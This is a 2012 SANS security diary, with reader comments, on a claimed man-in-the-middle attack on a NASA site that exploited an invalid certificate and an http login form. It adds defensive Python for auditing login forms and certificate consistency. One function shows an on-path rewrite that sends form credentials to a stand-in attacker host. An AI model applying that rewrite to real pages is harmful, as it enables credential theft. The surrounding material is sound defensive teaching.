
NASA Man-in-the-Middle Attack: Why you should use proper SSL Certificates

Published: 2012-05-31. Last Updated: 2012-05-31 18:38:02 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)

A posting to pastebin [1], by a group that calls itself "Cyber Warrior Team from Iran", claims to have breached a NASA website via a "Man in the Middle" attack. The announcement is a bit hard to read due to the broken English, but here is how I parse the post and the associated screenshot:

The "Cyber Warrior Team" used a tool to scan NASA websites for SSL misconfigurations. They came across a site that used an invalid, likely self-signed or expired, certificate. Users visiting this web site would be used to seeing a certificate warning and clicking through it, so an attacker's own certificate for the site, which triggers the very same warning, raises no additional alarm. This made it a lot easier to launch a man in the middle attack. In addition, the login form on the index page isn't delivered over SSL, making it possible to intercept and modify it unnoticed.

Once the attackers set up the man in the middle attack, they were able to collect usernames and passwords.

Based on this interpretation, the lesson should be to stop using self-signed or invalid certificates for "obscure" internal web sites. I have frequently seen the argument that for an internal web site "it is not important" or "too expensive" or "too complex" to set up a valid certificate. SSL isn't doing much for you if the client can't validate the certificate. The encryption provided by SSL only works if the authentication works as well: otherwise, you never know whether the key you negotiated was negotiated with the right party or with someone sitting between you and the server.

And of course, the login form on the index page should be delivered via SSL as well. Even if the form is submitted via SSL, it is subject to tampering if it is delivered via http instead of https: anyone on the path can rewrite the form's action to point at a server they control, or inject script that copies the credentials as they are typed, and the user sees no warning at all.
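The tampering described above, as an added example that is not part of the diary: a Python check that flags a password form delivered over http or posting over http, next to the rewrite an on-path attacker would apply to an http-delivered page. The sample page, host names and attacker URL are constructed for illustration and are assumptions, not taken from the NASA site or the pastebin post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> on the page, with its action resolved against the
    page URL and a flag for whether it contains a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A relative or empty action inherits the scheme of the page itself,
            # so a form on an http page with action="/login" posts over http.
            action = urljoin(self.page_url, attrs.get("action") or "")
            self._current = {"action": action, "has_password": False}
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def audit_login_page(page_url, html):
    """Return a list of findings for every form on the page that carries a
    password field: one if the page itself was not delivered over https
    (a man in the middle can rewrite the form), one if the form's action
    sends the credentials over something other than https."""
    parser = _FormCollector(page_url)
    parser.feed(html)
    parser.close()
    page_scheme = urlsplit(page_url).scheme.lower()
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        if page_scheme != "https":
            findings.append(
                f"login form delivered over {page_scheme}; an attacker on the path "
                f"can rewrite it before the user sees it ({page_url})")
        action_scheme = urlsplit(form["action"]).scheme.lower()
        if action_scheme != "https":
            findings.append(
                f"login form submits credentials over {action_scheme}: {form['action']}")
    return findings


def mitm_rewrite(html, attacker_url):
    """What an on-path attacker does to an http-delivered page: point every
    double-quoted form action at a server the attacker controls. The https
    action in the original page is no protection, because it is rewritten
    before the browser ever parses it."""
    return re.sub(r'(<form\b[^>]*\baction=")[^"]*(")',
                  lambda m: m.group(1) + attacker_url + m.group(2),
                  html, flags=re.IGNORECASE)


# Constructed sample page modelled on the scenario in the diary; the host
# names and the attacker URL are illustrative, not the NASA site.
SAMPLE_PAGE_URL = "http://intranet.example.com/index.html"
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://intranet.example.com/login">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Log in">
</form>
<form method="get" action="/search"><input name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("original page:", finding)
    tampered = mitm_rewrite(SAMPLE_HTML, "http://attacker.example.net/collect")
    for finding in audit_login_page(SAMPLE_PAGE_URL, tampered):
        print("after MITM:   ", finding)
```

Run against the constructed page, the original form already gets one finding (delivered over http) even though it posts to https; after the rewrite it gets a second one, because the credentials now go to the attacker over plain http. The same page served from an https URL produces no findings.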

Good old "OWASP Top 10" style lessons, but sadly, we still need to repeat them again and again. For a nice test to see if SSL is configured right on your site, see ssllabs.com [2].

Also, in more complex environments, you need to make sure that all of your SSL certificates are in sync. We recently updated SSL certificates, and forgot to update the one used by our IPv6 web server (thanks, Kees, for pointing that out to us).
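An added example (not the diary's own tooling, and not ssllabs.com) for the two certificate points above: that SSL only helps when the client can validate the certificate, and that every front end for a name, IPv6 included, must serve the same current certificate. The Python script below resolves all A and AAAA records for a name, performs a browser-style validation against each address (the optional cafile parameter covers an internal CA, the case raised in the comments), and reports rejected, expiring or inconsistent certificates. The addresses and results in SAMPLE_RESULTS are constructed for offline analysis; the hostname is whatever you pass on the command line.

```python
import hashlib
import socket
import ssl
import sys
import time


def resolve_all(hostname, port=443):
    """All A and AAAA addresses for the name. A certificate forgotten on the
    IPv6 front end only shows up if both address families are surveyed."""
    infos = socket.getaddrinfo(hostname, port, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def fetch_cert(hostname, address, port=443, cafile=None, timeout=5.0):
    """Connect to one address and validate the certificate the way a browser
    would: chain to a trusted root (the system store, or an internal CA bundle
    given as cafile) plus a hostname match. Failures are returned rather than
    raised so one bad front end does not abort the survey of the others."""
    ctx = ssl.create_default_context(cafile=cafile)  # CERT_REQUIRED, check_hostname=True
    try:
        with socket.create_connection((address, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=hostname) as tls:
                der = tls.getpeercert(binary_form=True)
                cert = tls.getpeercert()
        return {"address": address, "ok": True,
                "fingerprint": hashlib.sha256(der).hexdigest(),
                "not_after": ssl.cert_time_to_seconds(cert["notAfter"]),
                "error": None}
    except (ssl.SSLError, OSError) as exc:
        # Self-signed, expired and wrong-name certificates all land here.
        return {"address": address, "ok": False, "fingerprint": None,
                "not_after": None, "error": str(exc)}


def analyse(results, now=None, warn_days=30):
    """Turn a list of fetch_cert() results into findings. Kept free of network
    access so it can be run against recorded results."""
    now = time.time() if now is None else now
    findings = []
    for r in results:
        if not r["ok"]:
            findings.append(f"{r['address']}: certificate rejected: {r['error']}")
            continue
        days_left = int((r["not_after"] - now) // 86400)
        if days_left < warn_days:
            findings.append(f"{r['address']}: certificate expires in {days_left} days")
    fingerprints = {r["fingerprint"] for r in results if r["ok"]}
    if len(fingerprints) > 1:
        findings.append(f"{len(fingerprints)} different certificates served for the "
                        "same name; one front end (e.g. the IPv6 one) was probably "
                        "missed in the last rotation")
    return findings


def audit(hostname, port=443, cafile=None):
    """Survey every address of hostname and return the findings."""
    results = [fetch_cert(hostname, a, port, cafile) for a in resolve_all(hostname, port)]
    return analyse(results)


# Constructed survey results standing in for fetch_cert() output, modelled on
# the diary's IPv4/IPv6 mismatch; the addresses are documentation ranges,
# not real hosts, and the fingerprints are placeholders.
NOW = 1338508800  # 2012-06-01 00:00:00 UTC, around the diary's date
SAMPLE_RESULTS = [
    {"address": "192.0.2.10", "ok": True, "fingerprint": "a" * 64,
     "not_after": NOW + 400 * 86400, "error": None},
    {"address": "2001:db8::10", "ok": True, "fingerprint": "b" * 64,
     "not_after": NOW + 12 * 86400, "error": None},
    {"address": "192.0.2.11", "ok": False, "fingerprint": None, "not_after": None,
     "error": "certificate verify failed: self signed certificate"},
]

if __name__ == "__main__":
    findings = audit(sys.argv[1]) if len(sys.argv) > 1 else analyse(SAMPLE_RESULTS, now=NOW)
    print("\n".join(findings) or "no findings")
```

Note that a self-signed or expired certificate is reported as "rejected" rather than as an expiry warning: the default context refuses the handshake, which is exactly the behaviour you want a client to have, and which a user who has learned to click through warnings no longer gets.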

[1] http://pastebin.com/MFPMGZ4Z

[2] https://www.ssllabs.com

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Keywords: nasa

Comments

If you want SSL for internal websites but don't want to spend the money on SSL certificates, a good solution is to create your own CA Certificate and sign your certificates with your own CA. Then distribute your CA to all your clients (not feasible if you don't manage them), and you have free internal SSL.
We use a trusted internal root for many internal certificates. That is more or less what Microsoft wants you to do.
But since startssl.com is free, and trusted by most browsers, that is a solution that is often used as well. (Costs $60/year if you want 2-year certs and/or SAN.)

One problem today is that there are still servers out there that should have been nuked long ago. They do not support 2048-bit key lengths, which is the shortest you can buy a public certificate for.
Thanks for the info. I have had a couple of "internal" sites with self-signed certificates that were on SSL from the index page all the way through. My company does not want to provide funds to pay for a certificate for this, so the idea of creating your own CA cert is good. Thanks for the idea, Chris.

http://mjddesign.wordpress.com
One of the main issues is that the general user doesn't care about, or pay attention to, the red address bar when a certificate issue is detected in IE (Firefox makes you actually confirm that you accept the risk). Awareness training is needed to get those users to immediately stop browsing the site when they see the "bad cert" indicators.
